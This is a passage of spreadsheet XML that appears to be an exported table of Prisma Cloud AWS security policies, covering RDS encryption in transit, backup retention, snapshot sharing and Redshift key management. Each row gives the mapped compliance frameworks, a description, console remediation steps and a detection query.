          <t>ISO/IEC 27001:2022, Insurance Regulatory And Development Authority Of India, ISO/IEC 27001:2022, NYDFS 23 CRR-NY 500.0, NIST SP 800-171 Revision 3, ITSG-33, HITRUST CSF v.11.2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CRI Profile v2.0, SOC 2, SOC 2, DORA, Microsoft Cloud Security Benchmark v1, NIST CSF v2.0, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2056" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2056" s="2" t="inlineStr"/>
      <c r="D2056" t="inlineStr"/>
      <c r="E2056" t="inlineStr"/>
      <c r="F2056" t="inlineStr"/>
      <c r="G2056" t="b">
        <v>1</v>
      </c>
      <c r="H20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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2056" t="inlineStr">
        <is>
          <t>aws-rds</t>
        </is>
      </c>
      <c r="K2056" t="inlineStr">
        <is>
          <t>AWS RDS database instance not configured with encryption in transit</t>
        </is>
      </c>
      <c r="L2056" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2056" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2056" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2056" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2056" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2056" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2056" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S2056" t="inlineStr"/>
      <c r="T2056" t="b">
        <v>0</v>
      </c>
      <c r="U2056" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2056" t="inlineStr">
        <is>
          <t>aws-rds-describe-db-instances</t>
        </is>
      </c>
      <c r="W2056" t="inlineStr">
        <is>
          <t>This policy identifies AWS RDS database instances that are not configured with encryption in transit. This covers MySQL, SQL Server, PostgreSQL, MariaDB, and DB2 RDS instances.
Enabling encryption is crucial to protect data as it moves through the network and enhances the security between clients and storage servers. Without encryption, sensitive data transmitted between your application and the database is vulnerable to interception by malicious actors. This could lead to unauthorized access, data breaches, and potential compromises of confidential information.
It is recommended that data be encrypted while in transit to ensure its security and reduce the risk of unauthorized access or data breaches.</t>
        </is>
      </c>
      <c r="X2056" t="inlineStr">
        <is>
          <t>To enable the in-transit encryption feature for your Amazon RDS databases, perform the following actions:
Default parameter groups for RDS DB instances cannot be modified. Therefore, you must create a custom parameter group, modify it, and then attach it to your RDS for DB instances. Changes to parameters in a customer-created DB parameter group are applied to all DB instances that are associated with the DB parameter group.
Follow the below links to create and associate a DB parameter group with a DB instance,
To Create a DB parameter group, refer to the below link
https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_WorkingWithDBInstanceParamGroups.html#USER_WorkingWithParamGroups.Creating
To Associating a DB parameter group with a DB instance, refer the below link
https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_WorkingWithDBInstanceParamGroups.html#USER_WorkingWithParamGroups.Associating
To Modifying parameters in a DB parameter group,
1. Sign in to the AWS Management Console and open the Amazon RDS console at https://console.aws.amazon.com/rds/.
2. In the navigation pane, choose 'Parameter Groups'.
3. In the list, choose the parameter group that is associated with the RDS instance.
4. For Parameter group actions, choose 'Edit'.
5. Change the values of the parameters that you want to modify. You can scroll through the parameters using the arrow keys at the top right of the dialog box.
6. In the 'Modifiable parameters' section, enter 'rds.force_ssl' in the Filter Parameters search box for SQL Server and PostgreSQL  databases, and type 'require_secure_transport' in the search box for MySQL and MariaDB databases and type DB2COMM for DB2 databases.
 a. For the 'rds.force_ssl' database parameter, enter '1' in the Value configuration box to enable the Transport Encryption feature. 
  or
    b. For the 'require_secure_transport' parameter, enter '1' in the Value configuration box to enable the Transport Encryption feature.
    or
    c. For the 'DB2COMM' parameter, enter 'SSL' in the Value box based on the allowed values to enable Transport Encryption.
7. Choose Save changes.</t>
        </is>
      </c>
      <c r="Y2056" t="inlineStr"/>
      <c r="Z2056" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-rds-describe-db-instances' as X; config from cloud.resource where api.name = 'aws-rds-describe-db-parameter-groups' AND json.rule = (((dbparameterGroupFamily starts with "postgres" or dbparameterGroupFamily contains "sqlserver") and (['parameters'].['rds.force_ssl'].['parameterValue'] does not equal 1 or ['parameters'].['rds.force_ssl'].['parameterValue'] does not exist)) or ((dbparameterGroupFamily starts with "mariadb" or dbparameterGroupFamily starts with "mysql") and (parameters.require_secure_transport.parameterValue does not equal 1 or parameters.require_secure_transport.parameterValue does not exist)) or (dbparameterGroupFamily contains "db2-ae" and (parameters.db2comm.parameterValue does not equal ignore case "SSL" or parameters.db2comm.parameterValue does not exist))) as Y; filter '$.X.dbparameterGroups[*].dbparameterGroupArn equals $.Y.dbparameterGroupArn' ; show X;</t>
        </is>
      </c>
      <c r="AA2056" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2056" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2056" t="inlineStr">
        <is>
          <t>PC-AWS-RDS-1129</t>
        </is>
      </c>
      <c r="AD2056" t="b">
        <v>1</v>
      </c>
      <c r="AE2056" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2056" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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6" t="inlineStr">
        <is>
          <t>a95b30ca-281f-4ff9-b7c4-1f5543086f7c</t>
        </is>
      </c>
      <c r="AI2056" t="inlineStr">
        <is>
          <t>4ea6de73-a950-4d1b-95ba-84a5d9f4b5d4</t>
        </is>
      </c>
      <c r="AJ2056" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2056" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2057">
      <c r="A2057" t="inlineStr">
        <is>
          <t>CIS Controls v7.1, Sarbanes Oxley Act (SOX), CRI Profile v1.2.1, kashan ACSC Information Security Manual (ISM), TX-RAMP Level 1, APRA (CPS 234) Information Security, NYDFS 23 CRR-NY 500.0, ISO 27002:2022, NYDFS 23 CRR-NY 500.0, ISO/IEC 27001:2022, ITSG-33, kfirdaus AWS Account-CS, CRI Profile v2.0, HITRUST CSF v.11.2.0, HITRUST CSF v.9.6.0, NYDFS 23 CRR-NY 500.0, Copy of ACSC Information Security Manual (ISM)-clone, ACSC Information Security Manual (ISM), PCI DSS v4.0, NIST CSF v2.0, CDC NIST 800-53 Rev4, CSA CCM v4.0.12, MLPS 2.0 (Level 2), SOC 2, APRA (CPS 234) Information Security, NIST 800-53 Rev 5, CIS Controls v8.1, NIST 800-53 Rev4, PCI DSS v4.0, NIST 800-53 Rev 5, CSA CCM v4.0.12, NIST SP 800-171 Revision 3, MLPS 2.0, ISO/IEC 27001:2022, CSA CCM v.4.0.6, CyberSecurity Law of the People's Republic of China, TX-RAMP Level 2, kashan ACSC Information Security Manual (ISM), CIS Controls v8, DORA, Secure Controls Framework (SCF) - 2024.2, HITRUST v.9.4.2 [Deprecated], MAS TRM 2021, HITRUST v.9.4.2 [Deprecated], Insurance Regulatory And Development Authority Of India, TX-RAMP Level 2, Microsoft Cloud Security Benchmark v1, CIS Controls v8.1, MLPS 2.0 (Level 3), HITRUST CSF v.11.2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), kfirdaus AWS Account-CS, PCI DSS v4.0, DORA, Secure Controls Framework (SCF) - 2022.2.1, APRA (CPS 234) Information Security, PIPEDA, NIST SP 800-171 Revision 2, HITRUST CSF v.11.2.0, Copy of ACSC Information Security Manual (ISM)-clone, Copy of CIS Controls v8, RBI Baseline Cyber Security and Resilience Requirements, NIST SP 800-172, Secure Controls Framework (SCF) - 2024.2, ITSG-33, Risk Management in Technology (RMiT), Brazilian Data Protection Law (LGPD), Microsoft Cloud Security Benchmark v1, ACSC Information Security Manual (ISM), Cybersecurity Maturity Model Certification (CMMC) v.1.02, CHC HITRUST CSF v.9.6.0, NIST CSF, PCI DSS v3.2.1, Brazilian Data Protection Law (LGPD)</t>
        </is>
      </c>
      <c r="B2057" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2057" s="2" t="inlineStr"/>
      <c r="D2057" t="inlineStr"/>
      <c r="E2057" t="inlineStr"/>
      <c r="F2057" t="inlineStr"/>
      <c r="G2057" t="b">
        <v>1</v>
      </c>
      <c r="H20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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2057" t="inlineStr">
        <is>
          <t>aws-rds</t>
        </is>
      </c>
      <c r="K2057" t="inlineStr">
        <is>
          <t>AWS RDS retention policy less than 7 days</t>
        </is>
      </c>
      <c r="L2057" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2057" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2057" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2057" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2057" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2057" t="inlineStr">
        <is>
          <t>Control Category: 09.0</t>
        </is>
      </c>
      <c r="R2057" t="inlineStr">
        <is>
          <t>09.l</t>
        </is>
      </c>
      <c r="S2057" t="inlineStr"/>
      <c r="T2057" t="b">
        <v>0</v>
      </c>
      <c r="U2057" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2057" t="inlineStr">
        <is>
          <t>aws-rds-describe-db-instances</t>
        </is>
      </c>
      <c r="W2057" t="inlineStr">
        <is>
          <t>RDS Retention Policies for Backups are an important part of your DR/BCP strategy. Recovering data from catastrophic failures, malicious attacks, or corruption often requires a several day window of potentially good backup material to leverage. As such, the best practice is to ensure your RDS clusters are retaining at least 7 days of backups, if not more (up to a maximum of 35).</t>
        </is>
      </c>
      <c r="X2057" t="inlineStr">
        <is>
          <t>Configure your RDS backup retention policy to at least 7 days.
1. Go to the AWS console RDS dashboard.
2. In the navigation pane, choose Instances.
3. Select the database instance you wish to configure.
4. Click on  'Modify'.
5. Scroll down to Additional Configuration and set the retention period to at least 7 days under 'Backup retention period'.
6. Click Continue.
7. Under 'Scheduling of modifications' choose 'When to apply modifications'
8. On the confirmation page, Review the changes and Click on 'Modify DB Instance' to save your changes.</t>
        </is>
      </c>
      <c r="Y2057" t="inlineStr"/>
      <c r="Z2057" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-rds-describe-db-instances' AND json.rule = dbinstanceStatus equals available and (backupRetentionPeriod does not exist or backupRetentionPeriod less than 7)</t>
        </is>
      </c>
      <c r="AA2057" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2057" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2057" t="inlineStr">
        <is>
          <t>PC-AWS-RDS-261</t>
        </is>
      </c>
      <c r="AD2057" t="b">
        <v>1</v>
      </c>
      <c r="AE2057" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2057" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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7" t="inlineStr">
        <is>
          <t>bf55f5c1-d05d-4e2a-bd39-560f7900be88</t>
        </is>
      </c>
      <c r="AI2057" t="inlineStr">
        <is>
          <t>15a9ec38-a48f-415b-9c0c-14b9ae5b37c2</t>
        </is>
      </c>
      <c r="AJ2057" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2057" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2058">
      <c r="A2058" t="inlineStr">
        <is>
          <t>CSA CCM v3.0.1, HITRUST CSF v9.3 [Deprecated], ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, TX-RAMP Level 1, GDPR, APRA (CPS 234) Information Security, CSA CCM v3.0.1, ISO 27002:2022, NIST 800-53 Rev 5, MLPS 2.0 (Level 3), NIST CSF, NIST CSF v2.0, RBI Baseline Cyber Security and Resilience Requirements, NIST CSF, RBI Baseline Cyber Security and Resilience Requirements, MLPS 2.0 (Level 3), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, kfirdaus AWS Account-CS, ISO 27002:2022, kfirdaus AWS Account-CS, NIST SP 800-172, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST 800-171 Rev1, HITRUST CSF v9.3 [Deprecated], HITRUST CSF v9.3 [Deprecated], NIST CSF v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), GDPR, jbrox - GDPR, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, TX-RAMP Level 1, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO 27002:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), HITRUST CSF v9.3 [Deprecated], MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, HITRUST CSF v9.3 [Deprecated], MLPS 2.0, Microsoft Cloud Security Benchmark v1, kashan ACSC Information Security Manual (ISM), ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, kashan ACSC Information Security Manual (ISM), TX-RAMP Level 1, SOC 2, CDC NIST 800-53 Rev4, NIST 800-53 Rev4, NIST 800-53 Rev 5, SOC 2, ISO 27001:2013, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v7.1, NIST SP 800-171 Revision 3, ACSC Information Security Manual (ISM), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), kfirdaus AWS Account-CS, MAS TRM 2021, CyberSecurity Law of the People's Republic of China, NIST SP 800-171 Revision 3, CHC HITRUST CSF v.9.6.0, PCI DSS v4.0, NIST CSF, NIST SP 800-171 Revision 3, NIST CSF, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, Copy of CIS Controls v8, CRI Profile v1.2.1, PCI DSS v3.2.1, Risk Management in Technology (RMiT), CyberSecurity Law of the People's Republic of China, CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, MLPS 2.0 (Level 2), MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CRI Profile v2.0, NIST 800-171 Rev1, SOC 2, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NIST CSF, jbrox - GDPR, ISO/IEC 27001:2022, NIST 800-53 Rev4, MLPS 2.0, HITRUST CSF v9.3 [Deprecated], Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Secure Controls Framework (SCF) - 2022.2.1, APRA (CPS 234) Information Security, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CDC NIST 800-53 Rev4, NIST CSF, ISO/IEC 27001:2022, HITRUST v.9.4.2 [Deprecated], Copy of ACSC Information Security Manual (ISM)-clone, TX-RAMP Level 2, ISO 27002:2022, Secure Controls Framework (SCF) - 2024.2, Copy of CIS Controls v8, SOC 2, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Secure Controls Framework (SCF) - 2022.2.1, kashan ACSC Information Security Manual (ISM), HITRUST CSF v.9.6.0, CSA CCM v3.0.1, CCPA 2018, PIPEDA, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, NIST 800-171 Rev1, NIST CSF, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CyberSecurity Law of the People's Republic of China, ACSC Information Security Manual (ISM), Sarbanes Oxley Act (SOX), ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), NIST SP 800-171 Revision 2, FFIEC, NIST SP 800-172, CSA CCM v3.0.1, Brazilian Data Protection Law (LGPD), TX-RAMP Level 2, NIST 800-171 Rev1, Australian Energy Sector Cyber Security Framework (AESCSF), MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs)</t>
        </is>
      </c>
      <c r="B2058" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2058" s="2" t="inlineStr"/>
      <c r="D2058" t="inlineStr"/>
      <c r="E2058" t="inlineStr"/>
      <c r="F2058" t="inlineStr"/>
      <c r="G2058" t="b">
        <v>1</v>
      </c>
      <c r="H20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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2058" t="inlineStr">
        <is>
          <t>aws-rds</t>
        </is>
      </c>
      <c r="K2058" t="inlineStr">
        <is>
          <t>AWS RDS Snapshot with access for unmonitored cloud accounts</t>
        </is>
      </c>
      <c r="L2058" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2058" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2058" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2058" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2058" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2058" t="inlineStr">
        <is>
          <t>Guidelines for Database Systems</t>
        </is>
      </c>
      <c r="R2058" t="inlineStr">
        <is>
          <t>ISM-1249</t>
        </is>
      </c>
      <c r="S2058" t="inlineStr"/>
      <c r="T2058" t="b">
        <v>0</v>
      </c>
      <c r="U2058" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2058" t="inlineStr">
        <is>
          <t>aws-rds-describe-db-snapshots</t>
        </is>
      </c>
      <c r="W2058" t="inlineStr">
        <is>
          <t>This policy identifies RDS snapshots with access for unmonitored cloud accounts. The RDS Snapshot which have either the read / write permission opened up for Cloud Accounts which are NOT part of Cloud Accounts monitored by Prisma Cloud. These accounts with read / write privileges should be reviewed and confirmed that these are valid accounts of your organisation (or authorised by your organisation) and are not active under Prisma Cloud monitoring.</t>
        </is>
      </c>
      <c r="X2058" t="inlineStr">
        <is>
          <t>1. Sign into the AWS console.
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to the RDS service.
4. Select the identified 'RDS Snapshot' under the 'Snapshots' in the left hand menu.
5. Under the tab 'Snapshot Actions', selection the option 'Share Snapshot'.
6. Review and delete the AWS Accounts which should not have read access.</t>
        </is>
      </c>
      <c r="Y2058" t="inlineStr"/>
      <c r="Z2058" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type ='aws' and api.name = 'aws-rds-describe-db-snapshots' AND json.rule = "attributes[?(@.attributeName=='restore')].attributeValues[*] size != 0 and _AWSCloudAccount.isRedLockMonitored(attributes[?(@.attributeName=='restore')].attributeValues) is false"</t>
        </is>
      </c>
      <c r="AA2058" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2058" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2058" t="inlineStr">
        <is>
          <t>PC-AWS-RDS-62</t>
        </is>
      </c>
      <c r="AD2058" t="b">
        <v>1</v>
      </c>
      <c r="AE2058" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2058" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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8" t="inlineStr">
        <is>
          <t>5956e19e-eb8a-e0ba-68ec-a2ce2da26029</t>
        </is>
      </c>
      <c r="AI2058" t="inlineStr">
        <is>
          <t>5956e19e-eb8a-e0ba-68ec-a2ce2da26029</t>
        </is>
      </c>
      <c r="AJ2058" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2058" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2059">
      <c r="A2059" t="inlineStr">
        <is>
          <t>HIPAA, CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2024.2, CSA CCM v4.0.12, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, MLPS 2.0 (Level 3), GDPR, ISO 27002:2022, CSA CCM v.4.0.6, APRA (CPS 234) Information Security, MLPS 2.0 (Level 3), NIST SP 800-172, ISO/IEC 27001:2022, CHC HITRUST CSF v.9.6.0, CIS Controls v8, Risk Management in Technology (RMiT), CIS Controls v8.1, CIS Controls v7.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, HITRUST v.9.4.2 [Deprecated], SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Fedramp (Moderate), ISO/IEC 27018:2019, MLPS 2.0 (Level 2), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NYDFS 23 CRR-NY 500.0, ISO/IEC 27002:2013, MLPS 2.0, NIST 800-53 Rev 5, HITRUST CSF v.11.2.0, RBI Baseline Cyber Security and Resilience Requirements, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Fedramp (Moderate), ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, HITRUST CSF v.9.6.0, CRI Profile v1.2.1, Secure Controls Framework (SCF) - 2022.2.1, NIST CSF v2.0, Copy of CIS Controls v8, PCI DSS v4.0, NIST 800-53 Rev 5, NIST 800-53 Rev4, HITRUST v.9.4.2 [Deprecated], CyberSecurity Law of the People's Republic of China, jneytchev-fedramp-low, Fedramp (Low), SOC 2, ISO/IEC 27017:2015, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, GDPR, Microsoft Cloud Security Benchmark v1, DORA, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27002:2013, PCI DSS v4.0, NIST 800-53 Rev4, NIST CSF v2.0, Telecommunications Security Act - TSA, CDC NIST 800-53 Rev4, NIST 800-53 Rev4, ISO/IEC 27018:2019, CRI Profile v2.0, MAS TRM 2021, CyberSecurity Law of the People's Republic of China, ISO/IEC 27017:2015, DORA, PCI DSS v4.0, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, MLPS 2.0, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, Sarbanes Oxley Act (SOX), kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, APRA (CPS 234) Information Security, NIST CSF, NIST SP 800-171 Revision 3, SOC 2, NIST CSF, ACSC Information Security Manual (ISM), PCI DSS v4.0, HIPAA, Fedramp (Moderate), Risk Management in Technology (RMiT), ISO/IEC 27002:2013, PCI DSS v4.0, ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, APRA (CPS 234) Information Security, CCPA 2018, MAS TRM 2021, PIPEDA, ISO/IEC 27002:2013, CRI Profile v2.0, CDC NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2024.2, CyberSecurity Law of the People's Republic of China, CRI Profile v1.2.1, PCI DSS v4.0, NIST SP 800-171 Revision 2, Cybersecurity Maturity Model Certification (CMMC) v.1.02, PCI DSS v3.2.1, NIST 800-53 Rev 5, kfirdaus AWS Account-CS</t>
        </is>
      </c>
      <c r="B2059" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2059" s="2" t="inlineStr"/>
      <c r="D2059" t="inlineStr"/>
      <c r="E2059" t="inlineStr"/>
      <c r="F2059" t="inlineStr"/>
      <c r="G2059" t="b">
        <v>1</v>
      </c>
      <c r="H20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59" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2059" t="inlineStr">
        <is>
          <t>aws-redshift</t>
        </is>
      </c>
      <c r="K2059" t="inlineStr">
        <is>
          <t>AWS Redshift Cluster not encrypted using Customer Managed Key</t>
        </is>
      </c>
      <c r="L2059" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2059" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2059" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2059" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2059" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2059" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R2059" t="inlineStr">
        <is>
          <t>ISM-0459</t>
        </is>
      </c>
      <c r="S2059" t="inlineStr"/>
      <c r="T2059" t="b">
        <v>0</v>
      </c>
      <c r="U2059" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2059" t="inlineStr">
        <is>
          <t>aws-redshift-describe-clusters</t>
        </is>
      </c>
      <c r="W2059" t="inlineStr">
        <is>
          <t>This policy identifies Redshift Clusters which are encrypted with default KMS keys and not with Keys managed by Customer. It is a best practice to use customer managed KMS Keys to encrypt your Redshift databases data. Customer-managed CMKs give you more flexibility, including the ability to create, rotate, disable, define access control for, and audit the encryption keys used to help protect your data.</t>
        </is>
      </c>
      <c r="X2059" t="inlineStr">
        <is>
          <t>To enable encryption with Customer Managed Key on your Redshift cluster follow the steps mentioned in below URL:
https://docs.aws.amazon.com/redshift/latest/mgmt/changing-cluster-encryption.html 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-redshift-cluster-is-encrypted-by-kms
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-redshift-cluster-is-encrypted-by-kms</t>
        </is>
      </c>
      <c r="Y2059" t="inlineStr"/>
      <c r="Z2059" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-redshift-describe-clusters' as X; config from cloud.resource where api.name = 'aws-kms-get-key-rotation-status' as Y; filter '$.X.encrypted is true and $.X.kmsKeyId equals $.Y.key.keyArn and $.Y.keyMetadata.keyManager contains AWS'; show X;
{"category":"General","resourceTypes":["aws_redshift_cluster"]}</t>
        </is>
      </c>
      <c r="AA2059" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2059" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2059" t="inlineStr">
        <is>
          <t>PC-AWS-RED-318-CKV_AWS_142</t>
        </is>
      </c>
      <c r="AD2059" t="b">
        <v>1</v>
      </c>
      <c r="AE2059" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2059" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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59" t="inlineStr">
        <is>
          <t>dae05966-c2ac-480f-9ef5-50e91fd57782</t>
        </is>
      </c>
      <c r="AI2059" t="inlineStr">
        <is>
          <t>3597d4f8-7e3b-4c73-9418-00e3314e5f39</t>
        </is>
      </c>
      <c r="AJ2059" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2059" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2060">
      <c r="A2060" t="inlineStr">
        <is>
          <t>ISO 27001:2013, HIPAA, Secure Controls Framework (SCF) - 2024.2, GDPR, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, NIST 800-171 Rev1, GDPR, ISO 27002:2022, CSA CCM v.4.0.6, APRA (CPS 234) Information Security, CSA CCM v3.0.1, NIST SP 800-172, FFIEC, ISO/IEC 27001:2022, CHC HITRUST CSF v.9.6.0, CIS Controls v8, Risk Management in Technology (RMiT), CIS Controls v8.1, CIS Controls v7.1, CDC NIST 800-53 Rev4, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), jbrox - GDPR, APRA (CPS 234) Information Security, Fedramp (Moderate), NIST 800-53 Rev 5, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), FFIEC, HITRUST CSF v.11.2.0, RBI Baseline Cyber Security and Resilience Requirements, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Cybersecurity Maturity Model Certification (CMMC) v.1.02, Secure Controls Framework (SCF) - 2022.2.1, HITRUST CSF v.9.6.0, Fedramp (Low), CRI Profile v1.2.1, HITRUST CSF v9.3 [Deprecated], ISO 27001:2013, HITRUST CSF v9.3 [Deprecated], Secure Controls Framework (SCF) - 2022.2.1, NIST CSF v2.0, NIST 800-53 Rev4, CDC NIST 800-53 Rev4, 